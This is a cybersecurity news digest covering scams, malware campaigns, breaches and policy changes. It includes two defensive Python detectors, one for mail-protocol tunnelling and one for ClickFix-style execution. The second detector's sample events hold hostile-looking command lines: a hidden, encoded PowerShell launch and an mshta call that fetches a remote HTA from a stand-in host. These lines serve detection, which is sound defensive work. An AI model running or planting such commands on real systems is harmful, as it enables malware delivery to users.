👉 What are the latest cybersecurity alerts, incidents, and news?
FBI, Scammers, Self Service Websites, Apple, macOS, Security Flaw, Sandbox, PyPI, Gmail SMTP, Malware, Exfiltrate Data, MintsLoader, GhostWeaver, Phishing, ClickFix, LummaStealer, FakeCAPTCHA, Harrods, Cyberattack, Internet Access, Germany, Stuttgart, Website, Cyberattack, Oklahoma, Bartlesville Public Schools, Cyberattack, State Testing, Netherlands, Corendon, Arriva, DDoS Attack, Russian Hackers, South Africa, Cell C, RansomHouse, Apple, Spyware, UK, Canada, Data Protection, 23andMe, Bankruptcy, Ukrainian Extradited, Nefilim Ransomware, Raytheon, Nightwing, Fine, Cybersecurity Failures, Microsoft, Passwordless Accounts, Security.
1. Scammers Are Targeting Self Service Sites
The FBI has issued a warning about a growing scam targeting users of employee self-service websites. Cybercriminals are using search engine ads to direct individuals to fake sites designed to capture sensitive information such as login credentials and financial details. The fraudsters have shifted their focus from small businesses to payroll, unemployment programs, and health savings accounts, directly impacting individuals’ finances. Once the criminals gain access, they can carry out fraudulent activities, including wire transfers, redirecting paychecks, and using stolen identities for further crimes.
2. macOS Flaw Lets Hackers Bypass Sandbox
A critical vulnerability in macOS allows attackers to bypass the App Sandbox protection by exploiting security-scoped bookmarks. This flaw enables malicious actors to delete and replace keychain entries, which are essential for maintaining the system’s security boundaries. By crafting malicious bookmarks and injecting them into the system, attackers can bypass sandbox restrictions and access sensitive files without user consent. Apple has addressed the issue with security updates for affected systems and urges users to apply them promptly to mitigate potential risks.
3. PyPI Attack Uses Gmail to Exfiltrate Data
A sophisticated software supply chain attack exploited PyPI repositories to distribute seven malicious packages, amassing over 55,000 downloads. These packages used Google’s SMTP infrastructure to create a stealthy bidirectional tunnel for command-and-control, bypassing traditional security measures. Once deployed, the malware allowed attackers to remotely access internal APIs, dashboards, and admin panels, execute commands, and exfiltrate sensitive data.
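The defensive takeaway from the Gmail SMTP tunnel above is that mail-protocol egress to Google's servers from hosts and processes that are not mail clients or relays is a cheap, high-signal thing to alert on. The detector below is an added example written for this digest, not code from the original page or from any vendor; the egress log format, the allowlist of legitimate mail relays and clients, and the event threshold are all hypothetical, and the log lines are constructed.

```python
"""Flag SMTP/IMAP egress to Google mail servers from hosts or processes that
have no business speaking mail protocols directly (added example, not page code)."""
from collections import defaultdict

# Constructed sample egress log: one connection per line, key=value fields.
SAMPLE_LOG = """\
2025-05-02T10:00:01Z src=10.0.1.15 dst=smtp.gmail.com dport=587 proc=python3.exe
2025-05-02T10:00:31Z src=10.0.1.15 dst=smtp.gmail.com dport=587 proc=python3.exe
2025-05-02T10:01:01Z src=10.0.1.15 dst=imap.gmail.com dport=993 proc=python3.exe
2025-05-02T10:01:12Z src=10.0.1.22 dst=smtp.gmail.com dport=587 proc=outlook.exe
2025-05-02T10:02:00Z src=10.0.5.3 dst=smtp.gmail.com dport=25 proc=postfix
2025-05-02T10:02:10Z src=10.0.1.15 dst=pypi.org dport=443 proc=python3.exe
"""

MAIL_PORTS = {25, 465, 587, 143, 993}          # SMTP / submission / IMAP
GOOGLE_MAIL_HOSTS = {"smtp.gmail.com", "imap.gmail.com"}
# Hypothetical allowlists: the site's real mail relay and known mail clients.
ALLOWED_MAIL_RELAYS = {"10.0.5.3"}
MAIL_CLIENT_PROCS = {"outlook.exe", "thunderbird.exe", "postfix"}


def parse_line(line):
    """Parse one 'timestamp k=v k=v ...' record into a dict."""
    ts, *kvs = line.split()
    fields = dict(kv.split("=", 1) for kv in kvs)
    return {"ts": ts, "src": fields["src"], "dst": fields["dst"],
            "dport": int(fields["dport"]), "proc": fields["proc"]}


def find_mail_tunnel_candidates(log_text, min_events=2):
    """Return (src, proc) pairs that repeatedly reach Google mail servers on
    mail ports without being an approved relay or a known mail client."""
    counts = defaultdict(int)
    first_seen = {}
    destinations = defaultdict(set)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev["dst"] not in GOOGLE_MAIL_HOSTS or ev["dport"] not in MAIL_PORTS:
            continue
        if ev["src"] in ALLOWED_MAIL_RELAYS or ev["proc"].lower() in MAIL_CLIENT_PROCS:
            continue
        key = (ev["src"], ev["proc"])
        counts[key] += 1
        first_seen.setdefault(key, ev["ts"])
        destinations[key].add(f'{ev["dst"]}:{ev["dport"]}')
    return [
        {"src": src, "proc": proc, "count": n,
         "first_seen": first_seen[(src, proc)],
         "destinations": sorted(destinations[(src, proc)])}
        for (src, proc), n in counts.items() if n >= min_events
    ]


if __name__ == "__main__":
    for finding in find_mail_tunnel_candidates(SAMPLE_LOG):
        print("ALERT unexpected mail-protocol egress:", finding)
```

On the constructed log this yields a single finding: the interpreter process on 10.0.1.15 that opened three connections to smtp.gmail.com and imap.gmail.com, while the Outlook client and the postfix relay are suppressed by the allowlists. A production version would key on a proper process-identity source (EDR or Sysmon network events) rather than a process name in a flow log, since a name is trivially spoofed.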
4. MintsLoader Delivers GhostWeaver Malware
MintsLoader is a malware loader that delivers the GhostWeaver PowerShell trojan via phishing campaigns. It uses advanced evasion techniques such as sandbox detection, virtual machine evasion, and domain generation algorithms (DGA) to bypass security systems. Once deployed, GhostWeaver establishes persistent C2 communications, stealing browser data and delivering additional payloads. Social engineering tactics like ClickFix are also used to trick victims into executing malicious code, leading to further compromise.
5. LummaStealer Malware Uses FakeCAPTCHA Trick
LummaStealer malware has evolved to use FakeCAPTCHA as a social engineering tactic to harvest sensitive data. The malware primarily targets browser credentials, cryptocurrency wallets, and system information, posing a significant risk to both individual users and organizations. By manipulating users into executing malicious PowerShell scripts disguised as harmless files, it successfully bypasses conventional security measures. Security experts recommend heightened monitoring of PowerShell activity, mshta.exe behavior, and unusual external network connections to identify and prevent potential infections from this evolving threat.
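The monitoring advice for the FakeCAPTCHA / ClickFix chain above (PowerShell activity and mshta.exe behaviour) translates into a small set of process-creation heuristics: an interactive shell spawning powershell.exe or mshta.exe, hidden windows, encoded commands, execution-policy bypass, and mshta fetching remote content. The scorer below is an added example written for this digest, not code from the original page or from any product; the Sysmon-style event fields, the weights and the alert threshold are assumptions, and the sample events (including the harmless base64 string, which decodes to "ABCDEF") are constructed.

```python
"""Score process-creation events for the ClickFix / FakeCAPTCHA execution
pattern (added example, not page code). Event shape mirrors Sysmon Event ID 1."""
import re

# Constructed sample events. Only the first two should alert.
SAMPLE_EVENTS = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     # -enc payload is a placeholder that decodes to "ABCDEF".
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -enc QQBCAEMARABFAEYA"},
    {"pid": 4188,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://captcha-check.example/verify.hta"},
    {"pid": 5001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"pid": 5102,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Vendor\app.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\ui\help.hta"},
]

INTERACTIVE_PARENTS = {"explorer.exe"}          # Win+R / Run dialog launches
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

# (weight, description, predicate) - weights are hypothetical tuning values.
HEURISTICS = [
    (2, "script host spawned by interactive shell",
     lambda img, parent, cmd: img in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS),
    (2, "hidden window",
     lambda img, parent, cmd: re.search(r"-w(?:indowstyle)?\s+hidden", cmd) is not None),
    (2, "encoded command",
     lambda img, parent, cmd: re.search(r"-e(?:c|nc|ncodedcommand)\s", cmd) is not None),
    (1, "execution policy bypass",
     lambda img, parent, cmd: re.search(r"-e(?:p|xecutionpolicy)\s+bypass", cmd) is not None),
    (1, "profile suppressed",
     lambda img, parent, cmd: re.search(r"-nop(?:rofile)?\b", cmd) is not None),
    (3, "mshta loading remote content",
     lambda img, parent, cmd: img == "mshta.exe" and re.search(r"https?://", cmd) is not None),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, [matched heuristic descriptions]) for one event."""
    img = _basename(event["image"])
    parent = _basename(event["parent"])
    cmd = event["cmdline"].lower()
    score, reasons = 0, []
    for weight, desc, pred in HEURISTICS:
        if pred(img, parent, cmd):
            score += weight
            reasons.append(desc)
    return score, reasons


def find_clickfix_candidates(events, threshold=4):
    """Return alert records for events whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "image": _basename(ev["image"]),
                           "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_clickfix_candidates(SAMPLE_EVENTS):
        print("ALERT", alert)
```

Scoring rather than single-indicator matching keeps the scheduled `-File` backup script and the vendor's local .hta help viewer quiet while still firing on both the hidden encoded PowerShell launch and the remote-content mshta launch. In practice the explorer.exe parent check would be complemented by the Run dialog's RunMRU registry writes and by clipboard telemetry where it is available, since ClickFix relies on the user pasting the command.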
6. Harrods Cyberattack Limits Internet Access
Harrods, a luxury department store in London, recently faced a cyberattack attempt, leading to restricted internet access. Despite this, the store’s flagship location and online sales remained operational, and customers were advised to continue as normal. This attack comes shortly after similar incidents targeted Marks & Spencer and the Co-op in the UK, with M&S facing a significant ransomware attack. Experts warn that the frequency of these attacks highlights the growing vulnerability of retailers to cyber threats.
7. Stuttgart Website Down Due to Cyberattack
A cyberattack temporarily disrupted the Stuttgart city administration website in Germany, causing limited accessibility. The city took the site offline as a precaution on Tuesday evening, and it was restored by the afternoon. The attack, identified as a Distributed Denial of Service (DDoS) attack, flooded the site with excessive traffic, overwhelming its servers. Despite this, other city systems remained unaffected and continued to operate normally. The city administration is working diligently to secure the website and prevent similar attacks from impacting services in the future.
8. Bartlesville Schools Hit by Cyberattack
A cyberattack targeted Bartlesville Public Schools in Oklahoma, disabling much of the district’s computer network. As a result, the district had to cancel state testing and postpone it until the issue is resolved. While essential services like phones, life safety systems, and Chromebooks with hotspots continued to function, many systems were rendered inoperable. The district launched an investigation with external cybersecurity professionals, but no updates on sensitive data compromise or the length of the outage have been provided yet.
9. Russian Hackers Target Corendon and Arriva
Russian hacker group NoName targeted multiple Dutch companies, including Corendon, Arriva, AIS Airlines, and Allgobus, in a recent DDoS attack. The hackers, aligned with the Russian cause, issued a message blaming these companies for supporting Ukraine. Corendon’s website was temporarily offline due to the attack, affecting bookings, though check-ins and travel were unaffected. Arriva’s website also experienced disruption, with limited availability, and the company had anticipated the attack after observing a pattern targeting specific organizations.
10. Cell C Confirms Data Breach by RansomHouse
Cell C, South Africa’s fourth-largest mobile network operator, confirmed a cyberattack on its systems in November 2024. The hacker group RansomHouse claimed responsibility for the breach, disclosing 2TB of sensitive data, which included full names, contact details, banking information, medical records, and more. Although the exact number of affected individuals remains unclear, the company emphasized the potential risks of identity theft and fraud. Since discovering the attack, Cell C has worked with international cybersecurity experts to mitigate the damage.
11. Apple Alerts Users Worldwide of Spyware
Apple notified users in 100 countries this week, warning them that their phones were targeted by advanced commercial spyware. Among those who received notifications were Italian journalist Ciro Pellegrino and Dutch activist Eva Vlaardingerbroek, both of whom acknowledged the attack. The spyware’s origins are unclear, but Pellegrino suspects it is linked to a previous wave of Paragon attacks reported in January. Apple’s notifications highlight the severity of mercenary spyware, which can give attackers full access to victims’ devices without their knowledge or consent.
12. UK and Canada Demand Data Protection
As 23andMe undergoes bankruptcy proceedings, UK and Canadian regulators have raised alarms over customer data. On May 1, 2025, the UK’s Information Commissioner’s Office and Office of the Privacy Commissioner of Canada jointly called for the protection of sensitive personal information during and after the sale process. They warned potential buyers that failure to comply with data protection laws such as GDPR and PIPEDA could result in enforcement actions. The joint letter comes after the company faced significant scrutiny following a 2023 data breach that impacted millions.
13. Ukrainian Extradited to US Over Cyberattacks
A Ukrainian national, Artem Stryzhak, was extradited from Spain to the United States on April 30, 2025, to face charges related to his involvement in Nefilim ransomware attacks. The U.S. Department of Justice states that Stryzhak, 35, became an affiliate of the Nefilim group in 2021 and participated in attacks targeting high-revenue companies in countries including the U.S., Norway, France, and Germany. These attacks involved breaching corporate networks, stealing sensitive data, and demanding ransom payments in Bitcoin, with threats of leaking the stolen data if victims refused to pay.
14. Raytheon and Nightwing to Pay $8.4 Million
Raytheon and Nightwing Group have agreed to pay a combined $8.4 million to settle allegations of cybersecurity failures. Between 2015 and 2021, Raytheon’s CODEX division used a non-compliant network to handle non-classified defense information. This violation of federal cybersecurity standards led to the settlement, although Raytheon did not admit fault. The case, brought under the False Claims Act, highlights the increasing focus on holding defense contractors accountable for ensuring robust cybersecurity protections in line with government standards.
15. Microsoft Switches to Passwordless Accounts
Microsoft has made a significant shift in its security strategy by announcing that all new accounts will be passwordless by default. This change aims to enhance security by eliminating traditional password-related vulnerabilities, such as phishing and brute force attacks. Users will be prompted to use more secure alternatives like passkeys, which rely on biometric authentication methods such as fingerprints or facial recognition. The company began rolling out these updates in March, with a user experience designed to prioritize passkey-first authentication, offering a more streamlined and secure login process.
Copyright © 2025 CyberMaterial. All Rights Reserved.